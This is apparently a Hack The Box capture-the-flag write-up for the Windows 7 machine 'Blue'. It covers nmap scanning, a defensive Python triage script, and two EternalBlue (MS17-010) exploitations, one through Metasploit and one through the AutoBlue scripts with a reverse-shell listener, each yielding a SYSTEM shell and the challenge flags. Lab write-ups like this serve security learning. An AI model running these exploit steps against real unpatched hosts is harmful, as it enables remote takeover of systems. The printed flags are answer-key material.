Blue – 10.10.10.40

Nmap:

# Nmap 7.70 scan initiated Tue May 21 2019 as: nmap -sV -A -oN nmap.txt 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.032s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 (98%), Microsoft Windows 10 1507 - 1607 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista Business (96%), Microsoft Windows Vista SP0 or SP1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Vista SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 10 1703 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -29m27s, deviation: 34m36s, median: -9m28s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-05-21 06:14:45
|_  start_date: 2019-05-21 06:11:15

Played around with SMB for a while, but nothing really came up, so let's run some vulnerability scans.

root@kali:~/Documents/HTB/Blue-10.10.10.40-RETIRED# nmap --script ... -p445 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-06 14:09 EDT
Nmap scan report for 10.10.10.40
Host is up (0.037s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
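Reading the two scans above from the defender's side: the Python script below is an added example, not part of the original writeup and not code from nmap or any tool mentioned here. It parses the "Host script results:" block of nmap's normal (-oN) output and turns the smb-security-mode, smb2-security-mode and smb-vuln-ms17-010 results into ranked hardening findings, so a scan of your own estate can be triaged without reading it by eye. The two scan excerpts embedded in it are constructed to mirror the output above (one as scanned, one for a hardened host), and the remediation strings are general guidance rather than page content.

```python
"""Triage SMB host-script results from nmap normal (-oN) output.

Added, defender-side example; not part of the original writeup or of any
tool it uses. Parses the "Host script results:" block (smb-security-mode,
smb2-security-mode, smb-vuln-ms17-010) into prioritised hardening findings.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# A script header in nmap output is "| name:" with exactly one space after the bar.
SCRIPT_HEADER = re.compile(r"^\|_?\s(?P<name>[\w-]+):\s*$")
SEVERITY_RANK = {"info": 0, "medium": 1, "high": 2, "critical": 3}

# Constructed excerpt modelled on the scans of 10.10.10.40 in the writeup.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.40
Host is up (0.032s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
"""

# Constructed counter-example: SMBv1 removed, SMB2/3 signing enforced.
HARDENED_SCAN = """\
Host script results:
| smb2-security-mode:
|   3.11:
|_    Message signing enabled and required
"""


@dataclass
class Finding:
    title: str
    severity: str      # one of SEVERITY_RANK
    evidence: str      # the scan line (or CVE list) that triggered the finding
    remediation: str


def parse_host_scripts(scan_text: str) -> Dict[str, List[str]]:
    """Map each NSE script name to its de-indented output lines."""
    if "Host script results:" not in scan_text:
        return {}
    block = scan_text.split("Host script results:", 1)[1]
    scripts: Dict[str, List[str]] = {}
    current = None
    for line in block.splitlines()[1:]:      # [0] is the tail of the header line
        if not line.startswith("|"):
            break                             # blank line ends the script block
        header = SCRIPT_HEADER.match(line)
        if header:
            current = header.group("name")
            scripts[current] = []
        elif current is not None:
            scripts[current].append(line.lstrip("|_").strip())
    return scripts


def assess_smb(scripts: Dict[str, List[str]]) -> List[Finding]:
    """Derive hardening findings from parsed SMB script output, worst first."""
    findings: List[Finding] = []
    for line in scripts.get("smb-security-mode", []):
        if line.startswith("message_signing:") and "disabled" in line:
            findings.append(Finding(
                "SMBv1 reachable with message signing disabled", "medium", line,
                "Enforce SMB signing by policy and remove the SMBv1 server feature."))
    for line in scripts.get("smb2-security-mode", []):
        if "not required" in line.lower():
            findings.append(Finding(
                "SMB2 message signing not required", "medium", line,
                "Set 'Microsoft network server: Digitally sign communications (always)' to Enabled."))
    ms17 = scripts.get("smb-vuln-ms17-010", [])
    if any(l.startswith("State:") and "VULNERABLE" in l for l in ms17):
        cves = sorted({c for l in ms17 for c in re.findall(r"CVE-\d{4}-\d+", l)})
        findings.append(Finding(
            "MS17-010 (EternalBlue) not patched", "critical",
            ", ".join(cves) or "State: VULNERABLE",
            "Install the MS17-010 update, disable SMBv1, and block TCP/445 from untrusted networks."))
    findings.sort(key=lambda f: SEVERITY_RANK[f.severity], reverse=True)
    return findings


def triage(scan_text: str) -> List[Finding]:
    """Parse a scan and return its findings."""
    return assess_smb(parse_host_scripts(scan_text))


def highest_severity(findings: List[Finding]) -> str:
    """Worst severity present, or 'info' when the host is clean."""
    return findings[0].severity if findings else "info"


if __name__ == "__main__":
    for label, text in (("10.10.10.40 (as scanned)", SAMPLE_SCAN), ("hardened host", HARDENED_SCAN)):
        results = triage(text)
        print(f"{label}: {len(results)} finding(s), worst = {highest_severity(results)}")
        for f in results:
            print(f"  [{f.severity.upper():8}] {f.title}")
            print(f"             evidence: {f.evidence}")
            print(f"             fix:      {f.remediation}")
```

Feed it the -oN file from a scan of your own hosts (`triage(open("nmap.txt").read())`); the Blue-style host comes back as one critical and two medium findings, while the hardened host yields none. The parser relies on nmap's convention that a script header is `| name:` with a single space after the bar, so it also works on the smb-os-discovery and smb2-time blocks of the first scan even though it ignores them.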

Alright, we've got one. Let's exploit it.

Let's try it both ways.

  1. Msf console:

> use exploit/windows/smb/ms17_010_eternalblue
> show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Since guest access works and the RPORT default is correct, we only need to set RHOSTS.

After running this module we got a shell as SYSTEM, the Windows equivalent of root.

dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\

14/07/2009  04:20    <DIR>          PerfLogs
24/12/2017  03:23    <DIR>          Program Files
14/07/2017  17:58    <DIR>          Program Files (x86)
14/07/2017  14:48    <DIR>          Share
21/07/2017  07:56    <DIR>          Users
16/07/2017  21:21    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  15,457,017,856 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011           <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  15,457,017,856 bytes free

Here we can see there are two users, Administrator and haris. Let's first take the user flag.

C:\Users>cd haris
cd haris

C:\Users\haris>cd Desktop
cd Desktop

C:\Users\haris\Desktop>more user.txt
more user.txt
4c546aea7dbee75cbd71de245c8deea9

And finally, the root flag.

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\Administrator

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Contacts
24/12/2017  03:22    <DIR>          Desktop
21/07/2017  07:56    <DIR>          Documents
21/07/2017  07:56    <DIR>          Downloads
21/07/2017  07:56    <DIR>          Favorites
21/07/2017  07:56    <DIR>          Links
21/07/2017  07:56    <DIR>          Music
21/07/2017  07:56    <DIR>          Pictures
21/07/2017  07:56    <DIR>          Saved Games
21/07/2017  07:56    <DIR>          Searches
21/07/2017  07:56    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)               bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\Administrator\Desktop

24/12/2017  03:22    <DIR>          .
24/12/2017  03:22    <DIR>          ..
21/07/2017  07:56                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)               bytes free

C:\Users\Administrator\Desktop>more root.txt
more root.txt
  2. The manual way.

First, let's look up known exploits in Exploit-DB using searchsploit.

root@kali:~/Documents/HTB/Blue-10.10.10.40-RETIRED# searchsploit eternalblue
------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                         |  Path
                                                                                                       | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                       | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)   | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)             | exploits/windows_x86-64/remote/42030.py
------------------------------------------------------------------------------------------------------- ----------------------------------------

Shellcodes: No Result
------------------------------------------------------------------------------------------------------- ----------------------------------------
 Paper Title                                                                                           |  Path
                                                                                                       | (/usr/share/exploitdb-papers/)
------------------------------------------------------------------------------------------------------- ----------------------------------------
How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008                                          | docs/english/41896-how-to-exploit-eternalblue
How to Exploit ETERNALBLUE on Windows Server 2012 R2                                                   | docs/english/42280-how-to-exploit-eternalblue
[Spanish] How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008                                | docs/spanish/41897-[spanish]-how-to-exploit-et
[Spanish] How to Exploit ETERNALBLUE on Windows Server 2012 R2                                         | docs/spanish/42281-[spanish]-how-to-exploit-et
------------------------------------------------------------------------------------------------------- ----------------------------------------

root@kali:~/Documents/HTB/Blue-10.10.10.40-RETIRED# mkdir exploit
root@kali:~/Documents/HTB/Blue-10.10.10.40-RETIRED# cd exploit/
root@kali:~/Documents/HTB/Blue-10.10.10.40-RETIRED/exploit# cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

We found 42315.py and copied it to our working directory.

We analysed it and decided to look for an already adapted script instead. This one is a proof of concept that only creates a pwn.txt file in the root directory. We could change that ourselves, but why put in the effort when there are ready-to-go scripts on GitHub?

https://github.com/3ndG4me/AutoBlue-MS17-010

We downloaded it into our /opt directory and started the procedure.

  • Check if the target is vulnerable (we know it is, but we will still do the check)

root@kali:/opt/AutoBlue-MS17-010# python eternal_checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
Testing named pipes
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

As we thought, the target is vulnerable.

  • Now we need to prep a shell, so let's do this
  1. Make the payload!

Go into the shellcode dir and execute ./shell_prep.sh

  2. Make the listener

Navigate to the main dir and execute ./listener_prep.sh

root@kali:/opt/AutoBlue-MS17-010# ./listener_prep.sh
Eternal Blue Metasploit Listener
LHOST for reverse connection:
10.10.14.16
LPORT for x64 reverse connection:
8844
LPORT for x86 reverse connection:
8845
Enter 0 for meterpreter shell or 1 for regular cmd shell:
1
Type 0 if this is a staged payload or 1 if it is for a stageless payload
1
Starting listener (stageless)...
[ ok ] Starting postgresql (via systemctl): postgresql.service.
  3. Ready to pwn

root@kali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

After running this command a few times, our shell came through.

msf5 exploit(multi/handler) >
[*] Command shell session 1 opened (10.10.14.16:8844 -> 10.10.10.40:49160) at 2019-06-07 05:54:21 -0400
[*] Command shell session 2 opened (10.10.14.16:8844 -> 10.10.10.40:49161) at 2019-06-07 05 -0400

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

C:\Windows\system32>whoami
whoami
nt authority\system

We know where the flags are and we already have them. Let's seal this one.

User: 4c546aea7dbee75cbd71de245c8deea9

Root: ff548eb71e920ff6c08843ce9df4e717

ROOTED